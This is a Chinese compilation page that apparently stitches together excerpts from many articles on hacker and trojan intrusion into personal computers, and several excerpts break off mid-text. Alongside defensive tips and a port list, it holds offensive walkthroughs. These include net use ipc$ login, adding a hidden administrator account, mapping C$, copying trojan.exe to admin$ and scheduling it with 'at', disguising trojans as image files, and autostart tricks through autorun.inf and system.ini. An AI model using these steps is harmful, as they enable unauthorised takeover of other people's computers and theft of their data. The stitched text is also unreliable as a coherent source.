黑客木马入侵个人电脑的方法

合集下载

黑客可以利用哪些开放的端口对个人电脑进行入侵

黑客可以利用哪些开放的端口对个人电脑进行入侵

黑客可以利用哪些开放的端口对个人电脑进行入侵端口:0服务:Reserved说明:通常用于分析操作系统。

这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。

一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

端口:1服务:tcpmux说明:这显示有人在寻找SGI Irix机器。

Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。

Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。

许多管理员在安装后忘记删除这些帐户。

因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

端口:7服务:Echo说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。

端口:19服务:Character Generator说明:这是一种仅仅发送字符的服务。

UDP版本将会在收到UDP包后回应含有垃圾字符的包。

TCP连接时会发送含有垃圾字符的数据流直到连接关闭。

HACKER利用IP欺骗可以发动DoS攻击。

伪造两个chargen服务器之间的UDP 包。

同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP 的数据包,受害者为了回应这些数据而过载。

端口:21服务:FTP说明:FTP服务器所开放的端口,用于上传、下载。

最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。

这些服务器带有可读写的目录。

木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

端口:22服务:Ssh说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。

这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。

教你如何侵入别人的电脑

教你如何侵入别人的电脑

教你如何侵入别人的电脑.txt“恋”是个很强悍的字。

它的上半部取自“变态”的“变”,下半部取自“变态”的“态”。

1、取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。

2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入黑客命令之1:NET只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是hbx,密码是123456。

假设对方IP为127.0.0.1net use \\127.0.0.1\ipc$ "123456" /user:"hbx"退出的命令是net use \\127.0.0.1\ipc$ /delte下面的*作你必须登陆后才可以用.登陆的方法就在上面.----------------------下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add----------------------这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:\\127.0.0.1\c$----------------------net start telnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

网络黑客及其常用攻击方法

网络黑客及其常用攻击方法

计算机网络系统面临的严重安全问题之一就是黑客攻击。

黑客由产生初期的正义的“网络大侠”演变成计算机情报间谍和破坏者,他们利用计算机系统和网络存在的缺陷,使用手中计算机,通过网络强行侵入用户的计算机,肆意对其进行各种非授权活动,给社会、企业和用户的生活及工作带来了很大烦恼。

1.黑客的概念及类型(1)黑客及其演变“黑客”是英文“Hacker”的译音,源于Hack,本意为“干了一件非常漂亮的事”。

原指一群专业技能超群、聪明能干、精力旺盛、对计算机信息系统进行非授权访问的人。

后来成为专门利用计算机进行破坏或入侵他人计算机系统的人的代言词。

“骇客”是英文“Cacker”的译音,意为“破坏者和搞破坏的人”。

是指那些在计算机技术上有一定特长,非法闯入他人计算机及其网络系统,获取和破坏重要数据,或为私利而制造麻烦的具有恶意行为特征的人。

骇客的出现玷污了黑客,使人们把“黑客”和“骇客”混为一体。

早期的“黑客”是一些专门研究、发现计算机系统和网络漏洞的计算机爱好者。

他们只对计算机系统有着狂热的兴趣和执着的追求,不断地研究计算机和网络知识,喜欢挑战高难度的网络系统并从中找到漏洞,然后向管理员提出解决和修补漏洞的方法。

“黑客”不是恶意破坏者,是一群纵横于网络上的大侠,追求共享、免费,提倡自由、平等,“黑客”的出现推动了计算机和网络的发展与完善。

现在,黑客一词已经被用于那些专门利用计算机进行破坏或入侵他人计算机系统的代言词,指少数凭借掌握的计算机技术,怀着不良的企图,采用非法手段获得系统访问权或逃过计算机网络系统的访问控制,进入计算机网络进行未授权或非法访问的人。

虚拟的网络世界里,黑客已成为一个特殊的社会群体。

在世界上很多国家,有不少完全合法的黑客组织,经常召开黑客技术交流会,利用因特网在自己的网站上介绍黑客攻击手段,免费提供各种黑客工具软件,出版网上黑客杂志,致使普通用户也很容易下载并学会使用一些简单的黑客手段或工具,对网络进行某种程度的攻击,进一步地恶化了网络安全环境。

黑客常用的攻击手法

黑客常用的攻击手法

黑客常用的攻击手法互联网发展至今,除了它表面的繁荣外,也出现了一些不好的现象,其中网络安全问题特别被人们看重。

黑客是网上比较神秘的一类人物,真正的黑客是为保护网络安全而工作的,但近年来出现了许多的黑客软件,进而产生一些伪黑客,他们不必了解互联网知识,使用一些黑客软件就能对他人造成损害,从而使互联网安全出现了许多危机。

黑客进行攻击的手法很多,我在这里为大家介绍一下常见的几种。

一、利用网络系统漏洞进行攻击许多的网络系统都存在着这样那样的漏洞,这些漏洞有可能是系统本身所有的,如WindowsNT、UNIX等都有数量不等的漏洞,也有可能是由于网管的疏忽而造成的。

黑客利用这些漏洞就能完成密码探测、系统入侵等攻击。

对于系统本身的漏洞,可以安装软件补丁;另外网管也需要仔细工作,尽量避免因疏忽而使他人有机可乘。

在个人电脑上网时出现的蓝屏炸弹就是利用了Windows在网络方面的一个Bug。

二、通过电子邮件进行攻击电子邮件是互联网上运用得十分广泛的一种通讯方式。

黑客可以使用一些邮件炸弹软件或CGI程序向目的邮箱发送大量内容重复、无用的垃圾邮件,从而使目的邮箱被撑爆而无法使用。

当垃圾邮件的发送流量特别大时,还有可能造成邮件系统对于正常的工作反映缓慢,甚至瘫痪,这一点和后面要讲到的“拒绝服务攻击(DDoS)比较相似。

对于遭受此类攻击的邮箱,可以使用一些垃圾邮件清除软件来解决,其中常见的有SpamEater、Spamkiller等,Outlook等收信软件同样也能达到此目的。

三、解密攻击在互联网上,使用密码是最常见并且最重要的安全保护方法,用户时时刻刻都需要输入密码进行身份校验。

而现在的密码保护手段大都认密码不认人,只要有密码,系统就会认为你是经过授权的正常用户,因此,取得密码也是黑客进行攻击的一重要手法。

取得密码也还有好几种方法,一种是对网络上的数据进行监听。

因为系统在进行密码校验时,用户输入的密码需要从用户端传送到服务器端,而黑客就能在两端之间进行数据监听。

你了解黑客是怎样入侵我们电脑吗?

你了解黑客是怎样入侵我们电脑吗?

什么是电脑“肉鸡”所谓电脑肉鸡,就是拥有管理权限的远程电脑。

也就是受别人控制的远程电脑。

肉鸡可以是各种系统,如win,linux,unix等;更可以是一家公司\企业\学校甚至是政府军队的服务器,一般所说的肉鸡是一台开了3389端口的Win2K系统的服务器,所以3389端口没必要开时关上最好。

要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。

说到肉鸡,就要讲到远程控制。

远程控制软件例如灰鸽子、上兴等。

肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,现在许多人把有WEBSHELL 权限的机器也叫肉鸡。

谁都不希望自己的电脑被他人控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。

你的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。

如何检测自己是否成为肉鸡注意以下几种基本的情况:1:QQ、MSN的异常登录提醒(系统提示上一次的登录IP不符)2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至用正确的密码无法登录。

3:有时会突然发现你的鼠标不听使唤,在你不动鼠标的时候,鼠标也会移动,并且还会点击有关按钮进行操作。

4:正常上网时,突然感觉很慢,硬盘灯在闪烁,就象你平时在COPY文件。

5:当你准备使用摄像头时,系统提示,该设备正在使用中。

6:在你没有使用网络资源时,你发现网卡灯在不停闪烁。

如果你设定为连接后显示状态,你还会发现屏幕右下角的网卡图标在闪。

7:服务列队中出可疑程服务。

8:宽带连接的用户在硬件打开后未连接时收到不正常数据包。

(可能有程序后台连接)9:防火墙失去对一些端口的控制。

10:上网过程中计算机重启。

11:有些程序如杀毒软件防火墙卸载时出现闪屏(卸载界面一闪而过,然后报告完成。

)12:一些用户信任并经常使用的程序(QQ`杀毒)卸载后。

目录文仍然存在,删除后自动生成。

13:电脑运行过程中或者开机的时候弹出莫名其妙的对话框以上现象,基本是主观感觉,并不十分准确,但需要提醒您注意。

木马的伪装欺骗方法详解

木马的伪装欺骗方法详解

木马的伪装欺骗方法详解如今大多数上网的朋友警惕性都很高,想骗他们执行木马是件很困难的事。

即使电脑菜鸟都知道一见到exe 文件便不会轻易“招惹”它,因而中标的机会也就相对减少了。

但黑客们是不会甘于寂寞的,所以就出现了很多更容易让人上当的木马伪装手段。

本文介绍一些常见的木马伪装手段,希望对大家有所帮助。

1、将木马包装为图像文件首先,黑客最常使用骗别人执行木马的方法,就是将特洛伊木马说成为图像文件,比如说是照片等,应该说这是一个最不合逻辑的方法,但却是最多人中招的方法,有效而又实用。

只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe )为“类似”图像文件的名称,再假装传送照片给受害者,受害者就会立刻执行它。

为甚么说这是一个不合逻辑的方法呢?图像文件的扩展名根本就不可能是exe,而木马程序的扩展名基本上又必定是exe ,明眼人一看就会知道有问题,多数人在接收时一看见是exe文件,便不会接收了,那有什么方法呢? 其实方法很简单,他只要把文件名改变,例如把“sam.exe” 更改为“sam.jpg” ,那么在传送时,对方只会看见sam.jpg 了,而到达对方电脑时,因为windows 默认值是不显示扩展名的,所以很多人都不会注意到扩展名这个问题,而恰好你的计算机又是设定为隐藏扩展名的话,那么你看到的只是sam.jpg 了,受骗也就在所难免了!还有一个问题就是,木马本身是没有图标的,而在电脑中它会显示一个windows 预设的图标,别人一看便会知道了!但入侵者还是有办法的,这就是给文件换个“马甲”,即用IconForge等图标文件修改文件图标,这样木马就被包装成jpg 或其他图片格式的木马了,很多人会不经意间执行了它。

2、合并程序欺骗通常有经验的用户,是不会将图像文件和可执行文件混淆的,所以很多入侵者一不做二不休,干脆将木马程序说成是应用程序:反正都是以exe 作为扩展名的。

然后再变着花样欺骗受害者,例如说成是新出炉的游戏,无所不能的黑客程序等等,目地是让受害者立刻执行它。

计算机网络原理 黑客攻击常见方法

计算机网络原理  黑客攻击常见方法

计算机网络原理黑客攻击常见方法要想有效的防范黑客对我们计算机的入侵和破坏,仅安装防火墙是不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施。

1.木马入侵木马是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传到本地计算机或者我们浏览非法网站感染(利用了IE漏洞)的一种程序。

为了防止木马入侵,我们应该提高防范意识,不要随意运行别人发来的软件。

安装木马查杀软件,及时更新木马特征库。

2.ipc$共享入侵微软在Windows 2000/XP中设置的这个功能对个人用户来说几乎毫无用处。

反而成了黑客入侵NT架构操作系统的一条便利通道。

如果操作系统存在不安全的口令,那就更可被入侵。

例如一个典型的入侵流程如下:(1)通过猜测或者破解的手段得到对方计算机的帐户与口令。

(2)使用命令net use \xxx.xxx.xxx.xxx ipc$“密码”/user:“用户名”建立一个有一定权限的ipc$连接。

用copy trojan.exe \xxx.xxx.xxx.xxx admin$将木马程序的服务器端复制到系统目录下。

(3)用net time \xxx.xxx.xxx.xxx命令查看对方操作系统的时间,然后用at \xxx.xxx.xxx.xxx 12:00 trojan.exe 让trojan.exe在指定时间运行。

这样你的计算机就完全被黑客控制了。

当然用户可以禁用server服务、Task Scheduler服务、去掉网络文件和打印机共享前的对勾,也可以加强帐户与口令。

3.漏洞入侵利用IIS的Webdav漏洞攻击。

攻击成功后,在你的计算机的systen32系统文件夹中,可以执行的任何命令,都是在被入侵的机器上运行的。

例如,执行format命令,危害就相当大了。

也可以使用net user命令添加帐户。

当然,用户可以及时安装IIS的漏洞补丁。

4.页恶意代码入侵在我们浏览网页的时,不可避免的会遇到擅自修改注册表或者IE的默认主页,以及锁定注册表和修改鼠标右键菜单等等。

黑客常用的系统攻击方法木马

黑客常用的系统攻击方法木马
与一般的软件相反,反弹端口型木马是把客户 端的信息存于有固定IP的第三方FTP服务器上,服务 端从 FTP 服务器上取得信息后计算出客户端的IP和 端口,然后主动连接客户端。另外,网络神偷的服务 端与客户端在进行通信 ,是用合法端口,把数据包 含在像HTTP或FTP的报文中,这就是黑客们所谓的 “隧道”技术。
通过emial附件的形式 通过软件下载的形式
木马实施攻击的步骤
3. 启动木马 被动地等待木马或者是捆绑木马的 程序被执行 自动拷贝到windows系统文件下中, 并修改系统注册表启动项
4. 建立连接 服务器端安装了木马 双方均在线
5. 远程控制 最终的目的
课堂演练一:冰河木马的使用
服务器端程序:G-server.exe 客户端程序: G-client.exe
据最新一份市场调查报告,在8月到9月份中,全球范 围恶意软件的数量增长了15%。
该调查报告出自Panda安全公司,据悉全 球范围平均被恶意广告攻击过的电脑比率 达到了59%,创历史最高点。在所有29个 国家和地区中,美国排名第九,比率为 58%。与此同时,台湾排名第一,感染率 为69%,与此同时挪威只有39%,位列最 后。数据表明,美国恶意软件中,木马和 恶意广告为最主要的两个类型。
包含windows初始配置信息的重要文件其中的配置语句较复杂且对windows用户十分重要包含整个系统的信息如显示卡驱动程序等是存放windows启动时所需要的重要配置信息的文完整版课件ppt29木马启动方式设置在超级连接中完整版课件ppt30木马的检测查看进程完整版课件ppt31防御在安装新的软件之前请先备份注册表在安装完软件以后立即用杀毒软件查杀windows文件夹和所安装的软件的所在文件夹
木马的种类
代理类木马

防范黑客入侵攻击电脑的主要方法

防范黑客入侵攻击电脑的主要方法

般 需要 先确 定攻 击 目标 , 是要 确定 目标 电脑 的 I 址 。 就 P地 确
黑客利 用某 些 防火 墙漏 洞 ,将 自己 的 I 求设 置 为指 向 P请
防 火 墙 的路 径 , 不 是 防 火 墙 保 护 的 主 机 . 通 无 阻 地 接 近 防 而 畅
定 了 目标 I P地址 之后 , 客还 需要 目标计算 机 的各 种信 息 , 黑 这 些 信息 能 帮助 黑 客发 现 目标 的弱 点 。如 果能 将 自己上 网时 的
2 黑 客入 侵 电脑 的 方 式

般 上 网 的 个 人 电 脑 是 许 多 黑 客 ( 论 是 高 手 级 或 入 门 不
者) 与病 毒最 喜欢 下手 的 目标 。 多 电脑 都没 啥 防御 措施 , 许 即使
有 , 不 像 服 务 器 那 么 难 以入 侵 。 侵 一 台 电 脑 , 以 有 多 种 入 也 入 可
在登 录一 些站 点 , 别 是那 些提 供个 人服 务 ( 特 比如 股 票 、 银 行 ) 站 点 时 . 问 者往 往会 被 要求 填 写一 些 密码 之 类 的个人 的 访
信息, 黑客 就利用 这个 过程 窃取 访 问者 的秘密 。黑 客伪 造一个
登 录 页 面 , 在 真 正 的 登 录 页 面 之 前 出 现 . 访 问 者 认 真 写 下 抢 待 登 录信息 并发 送后 , 正 的登 录页 面才 出现 。 真

要: 病毒破 坏和 黑客攻 击是 目前 网络 中危 害 电脑 系统 的 两大不 安全 因素 。黑客是 破坏 网络安 全 的根 源。建立 完
善 的保 护 系统 , 有效地 防范黑客 的 恶意 攻击 , 维护 电脑安全 的根 本所 在 。 是

电脑黑客攻击的特征和防护方法

电脑黑客攻击的特征和防护方法

电脑黑客攻击的特征和防护方法在现代社会中,电脑黑客攻击已成为一种常见的安全威胁。

黑客利用各种技术手段侵入他人的电脑系统,窃取敏感信息、破坏系统功能,给个人和机构带来巨大损失。

本文将深入探讨电脑黑客攻击的特征以及相应的防护方法。

一、电脑黑客攻击的特征1. 钓鱼攻击钓鱼攻击是黑客常用的手段之一。

他们伪造看似信任的电子邮件、短信、网页等形式,引诱用户点击恶意链接或提供个人信息。

一旦用户点击,黑客就能获取用户的敏感信息,如密码、银行账号等。

2. 木马病毒木马病毒是电脑黑客攻击的重要工具之一。

它通过潜入到用户电脑系统中,控制受害者的计算机,并在背后窃取用户信息、监控用户活动、破坏系统等。

木马病毒通常通过可执行文件、下载的软件等方式传播。

3. DDoS攻击分布式拒绝服务(DDoS)攻击是一种通过使目标计算机系统的服务暂时停止,导致服务无法正常提供的攻击方式。

黑客通过将多个控制计算机(僵尸网络)的流量发送到目标计算机,从而消耗其带宽和资源。

这种攻击会导致目标服务器无法响应正常的请求,从而造成系统瘫痪。

4. 社交工程攻击社交工程攻击是一种通过欺骗性手段获取用户信息或破坏计算机系统的攻击方式。

黑客会利用心理学原理,以伪造身份、虚假信息等方式与目标用户建立信任关系,最终达到获取用户敏感信息或操控其计算机的目的。

二、电脑黑客攻击的防护方法1. 安装防火墙和杀毒软件安装强大的防火墙和有效的杀毒软件是保护电脑免受黑客攻击的首要措施。

防火墙可以监控和过滤进出网络的流量,阻挡未经授权的进入。

杀毒软件能够实时扫描、检测和清除潜在的病毒、木马等恶意软件。

2. 及时更新软件和操作系统黑客经常利用软件和操作系统中的漏洞进行攻击。

为了保持电脑的安全性,用户应及时更新软件和操作系统的安全补丁。

这些补丁通常包括修复已知漏洞的更新,可以有效地减少黑客的攻击风险。

3. 提高用户安全意识黑客攻击往往依赖于用户的错误操作或不慎行为。

因此,提高用户的安全意识非常重要。

可恶的黑客是怎样盗取他人密码和电脑信息的? Microsoft Word 文档

可恶的黑客是怎样盗取他人密码和电脑信息的? Microsoft Word 文档

可恶的黑客是怎样盗取他人密码和电脑信息的?
怎样防御呢?
满意答案
好评率:100%
使用软件或者是自己编写软件来搜索网络上的电脑用户和流量信息并截获密码的。

可以理解为一种监控形式。

防御只有安装正版防火墙了,别指望免费的有多大用处,当然高手黑客存心想整你再好的防火墙也没办法防的,只有没被他连接到之前断网。

黑客是没办法完全防御掉的,就象人不可能一辈子不生病一样。

其他答案
首先我在这里声明一点
你对黑客的认识是错误的
虽然我并不是一名黑客
但我和道
真正的黑客是不会轻易入侵他人的电脑的
盗取他人信息
那就更不能说是黑客了
充其量只能息是
懂点电脑的网络小偷罢了
你说的“可恶的黑客”是不对的
盗取密码和信息的方法有很多种
常见的有一种叫做暴力破解
通过一些破解软件
用大数次的偿长试来“试”出密码
通常暴力破解是和社会工程学分不开的所谓社会工程学
就是通过和对方聊天等
骗取对方的资料
以便更好更快地试出正确密码
另外还有就是特洛伊木马
就是人们常说的木马
木马这个词是怎么来的我就不再多说了
它盗取信息的原理:
将木马植入目标电脑后
木马会将电脑中的一此些重要文件自动COPY 然后发到制作这个木马的人指定的邮箱中。

另外还有键盘监视器等
我就不再一一多说了
希望你以后能正确对待“黑客”这个词
否则被真正的黑客听到
你会很麻烦的
好了就到这了。

电脑病毒木马入侵的方式有哪些

电脑病毒木马入侵的方式有哪些

电脑病毒木马入侵的方式有哪些病毒木马入侵的方式有些想都想都想不到,不用心是很难发现的,那么电脑病毒木马入侵的方式有哪些呢?下面由店铺给你做出详细的电脑病毒木马入侵的方式介绍!希望对你有帮助!电脑病毒木马入侵的方式介绍:入侵方式一、修改批处理很古老的方法,但仍有人使用。

一般通过修改下列三个文件来作案:Autoexec.bat(自动批处理,在引导系统时执行)Winstart.bat(在启动GUI图形界面环境时执行)Dosstart.bat(在进入MS-DOS方式时执行)例如:编辑C:\\windows\\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。

入侵方式二、修改系统配置常使用的方法,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有:在Win.ini文件中:[windows]load=程序名run=程序名在System.ini文件中:[boot]shell=Explorer.exe其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。

入侵方式三、借助自动运行功能这是黑客最新研发成果,之前该方法不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。

Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容:[autorun]open=Notepad.exe保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。

十大木马威胁个人用户网上银行安全使用

十大木马威胁个人用户网上银行安全使用

1.木马下载器——让系统安全功能全失,各路盗号木马快乐盗号A V终结者:专门与杀毒软件对抗,破坏用户电脑的安全防护系统,并在用户电脑毫无抵抗力的情况下,大量下载盗号木马的病毒。

机器狗:病毒直接操作磁盘以绕过系统文件完整性的检验,通过感染系统文件(比如explorer.exe、userinit.exe、winhlp32.exe等)达到隐蔽启动,通过底层技术穿透还原软件并可以下载大量盗号木马到用户电脑。

磁碟机:会关闭一些安全工具和杀毒软件并阻止其运行,并会不断检测窗口来阻止一些杀毒软件及安全辅助工具。

2.远程控制木马——让你的电脑屏幕现场直播账号密码灰鸽子:一个“中国制造”的隐蔽性极强的木马,连续数年被金山毒霸等反病毒厂商列为年度十大病毒。

用户一旦被入侵,电脑将沦为肉鸡,任人宰割。

攻击者可以对感染机器进行多种任务操作,如屏幕监控,键盘监控,强行视频等等。

3.网银专业盗号家族——专业就是生产力3.1 网银隐身劫匪一个针对工商银行网银的盗号木马。

病毒特征:当用户使用IE浏览器登陆工商银行网银系统进行网上交易时,病毒就会截取用户的支付卡号、接收卡号、密码、收款人姓名、收款人所在地、交易流水号、收款网点机构名、收款人所在网点机构、总金额等全部的敏感信息,窃取用户财产。

3.2 网银黑客盗号器61440一个黑客盗号程序。

病毒特征:与以往的网银盗号木马不同,该病毒在对抗安全软件方面下了些功夫,运行后会替换掉系统桌面文件explore.exe和beep.sys文件,替换后,用户获知系统异常的机会将被降低,从而让病毒能够躲避查杀。

然后记录下用户通过IE浏览器上网时输入的类似银行帐号和密码的数据,接着悄悄连接病毒作者指定的地址http://www.silvana****,将记录到的数据发送出去,导致用户网银帐号丢失。

3.3 网银大盗“网银大盗”病毒开启了偷盗网上银行个人用户信息的先河,并立刻引起了公众强烈的反响。

后来\"网银大盗\"出现变种,其共同之处在于:它们都是通过网络非主动地传播,只是在用户浏览某些网页、点击某些不明链接以及打开不明邮件的附件等操作时,才感染用户的电脑;它们的盗取对象都是网上银行个人用户的账号和密码等,然后再利用转账和网上支付等手段来窃取用户网上银行中的存款。

黑客入侵电脑的四大方式

黑客入侵电脑的四大方式

1 木马入侵木马也许是广大电脑爱好者最深恶痛绝的东东了,相信不少朋友都受到过它的骚扰。

木马有可能是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传的(例如下面会提到的ipc$共享入侵);也可能是我们浏览了一些**个人站点而通过网页浏览感染的(利用了IE漏洞);当然,最多的情况还是我们防范意识不强,随便运行了别人发来的所谓的mm图片、好看的动画之类的程序或者是在不正规的网站上随便下载软件使用。

应对措施:提高防范意识,不要随意运行别人发来的软件。

安装木马查杀软件,及时更新木马特征库。

推荐使用the cleaner,木马克星。

2 ipc$共享入侵微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。

反而成了黑客入侵nt架构操作系统的一条便利通道。

如果你的操作系统存在不安全的口令,那就更可怕了。

一条典型的入侵流程如下:(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。

如果你的密码位数不高,又很简单,是很容易被破解的。

根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。

(2)使用命令net use\\xxx.xxx.xxx.xxx\ipc$“密码” /user:“用户名”建立一个有一定权限的ipc$连接。

用copy trojan.exe\\xxx.xxx.xxx.xxx\admin$将木马程序的服务器端复制到系统目录下。

(3)用net time\\xxx.xxx.xxx.xxx命令查看对方操作系统的时间,然后用at\\202.xxx.xxx.xxx12:00 trojan.exe 让trojan.exe在指定时间运行。

这样一来,你的电脑就完全被黑客控制了。

应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾当然,给自己的帐户加上强壮的口令才是最关键的。

实用的初级黑客入侵教程

实用的初级黑客入侵教程
哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我 们面前了!
要是有这样的提示:
主机:218.88.55.55 3389,windows 2000 advance server terminal 端口开放。 简单管理员密码:
好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好, 太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)
ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太 懒了吧,难道下载地址在我脑子里?我不也是要搜吗?
好了,下边我们开始入侵了,下边就是过程:
第一步. 打开winntautoattack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始 ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾 上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息"
第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机 器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一 个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧?

计算机病毒如何入侵计算机

计算机病毒如何入侵计算机

计算机病毒如何入侵计算机计算机病毒导致我们计算机老是中病毒,那么计算机病毒是怎么样入侵我们电脑的呢?下面由店铺给你做出详细的计算机病毒入侵计算机方式介绍!希望对你有帮助!计算机病毒入侵计算机方式一:计算机病毒是如何"侵入" 计算机系统有2种情况:1.因为电脑的操作系统是有漏洞的,病毒是人为制造出来的(恶意程序),就是想通过操作系统的这些漏洞来侵入和攻击电脑操作系统。

2.大多数病毒是你去开了一些不安全的网站,或下载了一些不安全的东西。

病毒就利用网站漏洞进入你电脑,在你电脑上生成一些程序,用来破坏你电脑、控制你电脑或截取你一些资料。

我们建议您可以安装杀毒软件,减少中毒几率,比如经常用电脑管家,对电脑进行杀毒和扫描等。

电脑管家能有效预防和解决计算机上常见的安全风险。

在安全防护及病毒查杀方面的能力已经达到了国际一流杀软的同等水平,能够全面保障电脑安全。

2013年同时获得AV-Test和AV-C以及VB100%三项全球权威评测机构的反病毒测试和其他奖项,开创国内杀软的最好成绩,也是中国首款杀毒和优化管理功能2合1的安全软件。

计算机病毒入侵计算机方式二:首先,先跟你解释下什么叫木马:通过入侵电脑(比如网页、文件、漏洞等),伺机DAO取账号密码的恶意程序,它是电脑病毒中一种。

通常木马会自动运行,在你的上网过程中,如果登录网yin、聊天账号等,你的个人安全信息都会被QIE取,从而导致用户账号被dao用、CAI产遭受损失。

推荐试试腾讯电脑管家,它是免费专业安全软件,杀毒管理二合一(只需要下载一份),占内存小,杀毒好,防护好,无误报误杀。

拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎!保证杀毒质量。

如果遇到顽固木马,可用首页——工具箱——顽固木马克星,强力查杀,效果相当不错的。

建议你在用杀毒软件检测出木马病毒后,第一时间进行清除。

常见攻击步骤

常见攻击步骤

常见攻击步骤第一步:隐藏自已的位置普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。

老练的攻击者还会利用800电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。

第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。

在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。

当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。

此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。

第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。

这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。

当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

第四步:获得控制权攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。

他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。

大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。

攻击者一般会使用rep传递这些文件,以便不留下FTB记录。

清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。

如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。

